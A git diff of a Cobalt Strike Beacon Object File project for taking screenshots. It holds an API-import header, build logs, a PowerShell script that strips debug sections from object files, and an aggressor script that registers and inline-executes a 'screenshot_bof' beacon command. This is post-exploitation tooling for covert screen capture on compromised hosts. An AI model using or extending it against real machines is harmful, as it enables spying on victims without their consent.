MSVCRT$time(time_t* time); + + +/* SystemInfo */ +DECLSPEC_IMPORT void WINAPI KERNEL32$GetSystemInfo(LPSYSTEM_INFO lpSystemInfo); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$IsProcessorFeaturePresent(DWORD ProcessorFeature); +DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetUserNameW(LPWSTR lpBuffer, LPDWORD pcbBuffer); + + + + + + +#ifdef __cplusplus +} +#endif + + +/* helper macros */ + +#define malloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) /* trustedsec */ +#define free(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, (LPVOID)addr) /* trustedsec */ +#define ZeroMemory(address, size) memset(address, 0, size); + + +/* ----------------------------------- DEFINITIONS ------------------------------------------*/ + +/* COM */ +#define CLSIDFromString OLE32$CLSIDFromString +#define CoCreateInstance OLE32$CoCreateInstance +#define CoInitializeEx OLE32$CoInitializeEx +#define CoUninitialize OLE32$CoUninitialize +#define IIDFromString OLE32$IIDFromString +#define CoInitialize OLE32$CoInitialize +#define CoCreateInstanceEx OLE32$CoCreateInstanceEx +#define SysAllocString OleAut32$SysAllocString +#define VariantInit OLEAUT32$VariantInit +#define CoInitialize OLE32$CoInitialize +#define CoInitializeSecurity OLE32$CoInitializeSecurity + +/* memory */ +#define HeapFree KERNEL32$HeapFree +#define HeapAlloc KERNEL32$HeapAlloc +#define HeapReAlloc KERNEL32$HeapReAlloc +#define memcpy MSVCRT$memcpy +#define memset MSVCRT$memset + + +/* process */ +#define GetProcessHeap KERNEL32$GetProcessHeap +#define CreateProcessWithLogonW ADVAPI32$CreateProcessWithLogonW +#define OpenProcess KERNEL32$OpenProcess +#define VirtualQueryEx KERNEL32$VirtualQueryEx +#define GetProcessId KERNEL32$GetProcessId +#define ReadProcessMemory KERNEL32$ReadProcessMemory +#define GetCurrentProcess KERNEL32$GetCurrentProcess +#define Sleep KERNEL32$Sleep +#define LookupPrivilegeValueW ADVAPI32$LookupPrivilegeValueW +#define GetModuleFileNameExW PSAPI$GetModuleFileNameExW + + +/* debug */ +#define EnumerateLoadedModulesW64 DBGHELP$EnumerateLoadedModulesW64 +#define SymInitializeW DBGHELP$SymInitializeW +#define SymCleanup DBGHELP$SymCleanup + + +/* filesystem */ +#define CreateFileA KERNEL32$CreateFileA +#define SetFilePointer KERNEL32$SetFilePointer +#define SetFilePointerEx KERNEL32$SetFilePointerEx +#define WriteFile KERNEL32$WriteFile +#define GetFileSizeEx KERNEL32$GetFileSizeEx +#define GetFileVersionInfoSizeW VERSION$GetFileVersionInfoSizeW +#define GetFileVersionInfoW VERSION$GetFileVersionInfoW +#define VerQueryValueW VERSION$VerQueryValueW + +/* error */ +#define GetLastError KERNEL32$GetLastError + + +/* registry */ +#define RegOpenKeyExA ADVAPI32$RegOpenKeyExA +#define RegDeleteTreeA ADVAPI32$RegDeleteTreeA +#define RegCreateKeyExA ADVAPI32$RegCreateKeyExA +#define RegSetValueExA ADVAPI32$RegSetValueExA + + +/* directory */ +#define RemoveDirectoryA KERNEL32$RemoveDirectoryA +#define CreateDirectoryA KERNEL32$CreateDirectoryA +#define MoveFileA KERNEL32$MoveFileA +#define PathIsDirectoryA SHLWAPI$PathIsDirectoryA +#define PathFileExistsA SHLWAPI$PathFileExistsA + + +/* strings */ +#define strchr MSVCRT$strchr +#define strcat_s MSVCRT$strcat_s +#define strcpy_s MSVCRT$strcpy_s +#define strncpy_s MSVCRT$strncpy_s +#define snprintf MSVCRT$_snprintf /*beacon can't find snprintf without the preceeding '_' */ +#define wcslen MSVCRT$wcslen +#define vsnprintf MSVCRT$vsnprintf +#define lstrlenW KERNEL32$lstrlenW +#define lstrcpyW KERNEL32$lstrcpyW +#define strcmp MSVCRT$strcmp +#define lstrcpyA Kernel32$lstrcpyA +#define lstrcatA Kernel32$lstrcatA +#define lstrcpynA Kernel32$lstrcpynA +#define lstrlenW KERNEL32$lstrlenW +#define lstrcpyW KERNEL32$lstrcpyW +#define sprintf MSVCRT$sprintf + + +/* RPC */ +#define RpcStringFreeA Rpcrt4$RpcStringFreeA +#define UuidCreate Rpcrt4$UuidCreate +#define UuidToStringA Rpcrt4$UuidToStringA + + +/* Random */ +#define srand MSVCRT$srand +#define rand MSVCRT$rand + + +/* DateTime */ +#define time MSVCRT$time + + +/* SystemInfo */ +#define GetSystemInfo KERNEL32$GetSystemInfo +#define GetUserNameW ADVAPI32$GetUserNameW +#define IsProcessorFeaturePresent KERNEL32$IsProcessorFeaturePresent + +#else + +#endif diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log new file mode 100644 index 0000000..a901931 --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log @@ -0,0 +1,23 @@ + Microsoft (R) C/C++ Optimizing Compiler Version 19.27.29111 for x64 + Copyright (C) Microsoft Corporation. All rights reserved. + + cl /c /D BOF /GS- /Fo"intermediary\BOF\x64\\" /TP /c /Fo"intermediary\BOF\x64\source" Source.cpp +cl : Command line warning D9025: overriding '/Fointermediary\BOF\x64\' with '/Fointermediary\BOF\x64\source' + + Source.cpp +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(93): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(96): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(99): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(102): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(105): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition + C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory' + C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x64\source.obj + 1 File(s) copied + enumerating sections... + found debug section.. zeroing it... + closing stream... + done! diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.command.1.tlog b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.command.1.tlog new file mode 100644 index 0000000..4c0ca66 Binary files /dev/null and b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.command.1.tlog differ diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.read.1.tlog b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.read.1.tlog new file mode 100644 index 0000000..b8fc32e Binary files /dev/null and b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.read.1.tlog differ diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.write.1.tlog b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.write.1.tlog new file mode 100644 index 0000000..80fe074 Binary files /dev/null and b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.write.1.tlog differ diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate new file mode 100644 index 0000000..574e8b2 --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate @@ -0,0 +1,2 @@ +PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.18362.0: +BOF|x64|C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\| diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.vcxproj.FileListAbsolute.txt b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.vcxproj.FileListAbsolute.txt new file mode 100644 index 0000000..e69de29 diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.Build.CppClean.log b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.Build.CppClean.log new file mode 100644 index 0000000..4e915dc --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.Build.CppClean.log @@ -0,0 +1,5 @@ +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\source.obj +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\bin\bof\screenshotbof.x64.obj +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.command.1.tlog +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.read.1.tlog +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.write.1.tlog diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.recipe b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.recipe new file mode 100644 index 0000000..784a6a3 --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.recipe @@ -0,0 +1,7 @@ + + + C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\bin\BOF\ScreenshotBOFx64 + + + + \ No newline at end of file diff --git a/ScreenshotBOF/intermediary/BOF/x64/source.obj b/ScreenshotBOF/intermediary/BOF/x64/source.obj new file mode 100644 index 0000000..bb9578a Binary files /dev/null and b/ScreenshotBOF/intermediary/BOF/x64/source.obj differ diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.log b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.log new file mode 100644 index 0000000..032e56b --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.log @@ -0,0 +1,23 @@ + Microsoft (R) C/C++ Optimizing Compiler Version 19.27.29111 for x86 + Copyright (C) Microsoft Corporation. All rights reserved. + + cl /c /Oy- /D BOF /GS- /Fo"intermediary\BOF\x86\\" /TP /analyze- /c /Fo"intermediary\BOF\x86\source" Source.cpp +cl : Command line warning D9025: overriding '/Fointermediary\BOF\x86\' with '/Fointermediary\BOF\x86\source' + + Source.cpp +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(93): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(96): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(99): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(102): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(105): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition + C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory' + C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x86\source.obj + 1 File(s) copied + enumerating sections... + found debug section.. zeroing it... + closing stream... + done! diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.command.1.tlog b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.command.1.tlog new file mode 100644 index 0000000..6a73a70 Binary files /dev/null and b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.command.1.tlog differ diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.read.1.tlog b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.read.1.tlog new file mode 100644 index 0000000..6ca20fe Binary files /dev/null and b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.read.1.tlog differ diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.write.1.tlog b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.write.1.tlog new file mode 100644 index 0000000..b9591e2 Binary files /dev/null and b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.write.1.tlog differ diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate new file mode 100644 index 0000000..0f1e4ec --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate @@ -0,0 +1,2 @@ +PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.18362.0: +BOF|Win32|C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\| diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.vcxproj.FileListAbsolute.txt b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.vcxproj.FileListAbsolute.txt new file mode 100644 index 0000000..e69de29 diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.Build.CppClean.log b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.Build.CppClean.log new file mode 100644 index 0000000..242f4fc --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.Build.CppClean.log @@ -0,0 +1,5 @@ +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\source.obj +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\bin\bof\screenshotbof.x86.obj +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.command.1.tlog +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.read.1.tlog +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.write.1.tlog diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.recipe b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.recipe new file mode 100644 index 0000000..b68b3d1 --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.recipe @@ -0,0 +1,7 @@ + + + C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\bin\BOF\ScreenshotBOFx32 + + + + \ No newline at end of file diff --git a/ScreenshotBOF/intermediary/BOF/x86/source.obj b/ScreenshotBOF/intermediary/BOF/x86/source.obj new file mode 100644 index 0000000..b128ff8 Binary files /dev/null and b/ScreenshotBOF/intermediary/BOF/x86/source.obj differ diff --git a/ScreenshotBOF/resources/strip_bof.ps1 b/ScreenshotBOF/resources/strip_bof.ps1 new file mode 100644 index 0000000..059809a --- /dev/null +++ b/ScreenshotBOF/resources/strip_bof.ps1 @@ -0,0 +1,127 @@ +function strip-bof { +<# +.SYNOPSIS + Removes debug symbols from a beacon object file + + Heavily dependent on code by Matthew Graeber (@mattifestation) + Original code: https://www.powershellgallery.com/packages/PowerSploit/1.0.0.0/Content/PETools%5CGet-ObjDump.ps1 + Author: Yasser Alhazmi (@yas_o_h) + License: BSD 3-Clause + +.PARAMETER Path + + Specifies a path to one or more object file locations. + +.EXAMPLE + + C:\PS>strip-bof -Path main.obj + +#> + + [CmdletBinding()] Param ( + [Parameter(Position = 0, Mandatory = $True)] + [ValidateScript({ Test-Path $_ })] + [String] + $Path + ) + + + $Code = @' + using System; + using System.IO; + using System.Text; + + namespace COFF + { + + + public class SECTION_HEADER + { + public string Name; + public uint PhysicalAddress; + public uint VirtualSize; + public uint VirtualAddress; + public uint SizeOfRawData; + public uint PointerToRawData; + public uint PointerToRelocations; + public uint PointerToLinenumbers; + public ushort NumberOfRelocations; + public ushort NumberOfLinenumbers; + public uint Characteristics; + public Byte[] RawData; + + public SECTION_HEADER(BinaryReader br) + { + this.Name = Encoding.UTF8.GetString(br.ReadBytes(8)).Split((Char) 0)[0]; + this.PhysicalAddress = br.ReadUInt32(); + this.VirtualSize = this.PhysicalAddress; + this.VirtualAddress = br.ReadUInt32(); + this.SizeOfRawData = br.ReadUInt32(); + this.PointerToRawData = br.ReadUInt32(); + this.PointerToRelocations = br.ReadUInt32(); + this.PointerToLinenumbers = br.ReadUInt32(); + this.NumberOfRelocations = br.ReadUInt16(); + this.NumberOfLinenumbers = br.ReadUInt16(); + this.Characteristics = br.ReadUInt32(); + } + } + + + public class HEADER + { + public ushort Machine; + public ushort NumberOfSections; + public uint TimeDateStamp; + public uint PointerToSymbolTable; + public uint NumberOfSymbols; + public ushort SizeOfOptionalHeader; + public ushort Characteristics; + + public HEADER(BinaryReader br) + { + this.Machine = br.ReadUInt16(); + this.NumberOfSections = br.ReadUInt16(); + this.TimeDateStamp = br.ReadUInt32(); + this.PointerToSymbolTable = br.ReadUInt32(); + this.NumberOfSymbols = br.ReadUInt32(); + this.SizeOfOptionalHeader = br.ReadUInt16(); + this.Characteristics = br.ReadUInt16(); + } + } +} +'@ + + Add-Type -TypeDefinition $Code + Write-Host "enumerating sections..." + try { + $FileStream = [IO.File]::OpenRead($Path) + $BinaryReader = New-Object IO.BinaryReader($FileStream) + $CoffHeader = New-Object COFF.HEADER($BinaryReader) + + # Parse section headers + $SectionHeaders = New-Object COFF.SECTION_HEADER[]($CoffHeader.NumberOfSections) + + for ($i = 0; $i -lt $CoffHeader.NumberOfSections; $i++) + { + $SectionHeaders[$i] = New-Object COFF.SECTION_HEADER($BinaryReader) + + if($SectionHeaders[$i].Name.Contains("debug")){ + Write-Host "found debug section.. zeroing it..." + $FileStream.Close(); + $FileStream2 = [IO.File]::OpenWrite($Path) + $FileStream2.Seek($SectionHeaders[$i].PointerToRawData, 'Begin') | Out-Null + for($x = 0; $x -lt $SectionHeaders[$i].SizeOfRawData; $x++){ + $FileStream2.WriteByte(0) + } + Write-Host "closing stream..."; + $FileStream2.Close(); + Write-Host "done!"; + return; + } + } + } catch { + Add-Type -AssemblyName PresentationFramework + [System.Windows.MessageBox]::Show("error stripping debug symbols: " + $_.ToString()); + return; + } +} \ No newline at end of file diff --git a/bin/BOF/ScreenshotBOF.x64.obj b/bin/BOF/ScreenshotBOF.x64.obj new file mode 100644 index 0000000..6f339ac Binary files /dev/null and b/bin/BOF/ScreenshotBOF.x64.obj differ diff --git a/bin/BOF/ScreenshotBOF.x86.obj b/bin/BOF/ScreenshotBOF.x86.obj new file mode 100644 index 0000000..d9e59fd Binary files /dev/null and b/bin/BOF/ScreenshotBOF.x86.obj differ diff --git a/bin/BOF/screenshotBOF.cna b/bin/BOF/screenshotBOF.cna new file mode 100644 index 0000000..72d48df --- /dev/null +++ b/bin/BOF/screenshotBOF.cna @@ -0,0 +1,21 @@ +#Register command +beacon_command_register( + "screenshot_bof", + "Alternative screenshot capability that does not do fork n run", + "Synopsis: screenshot_bof" +); + +alias screenshot_bof { + local('$barch $handle $data $args $target_pid'); + println(@_); + # figure out the arch of this session + $barch = barch($1); + # read in the right BOF file + $handle = openf(script_resource("screenshotBOF. $+ $barch $+ .obj")); + $data = readb($handle, -1); + closef($handle); + # announce what we're doing + btask($1, "Running screenshot BOF by (@codex_tf2)"); + # execute it. + beacon_inline_execute($1, $data, "go", $args); +} \ No newline at end of file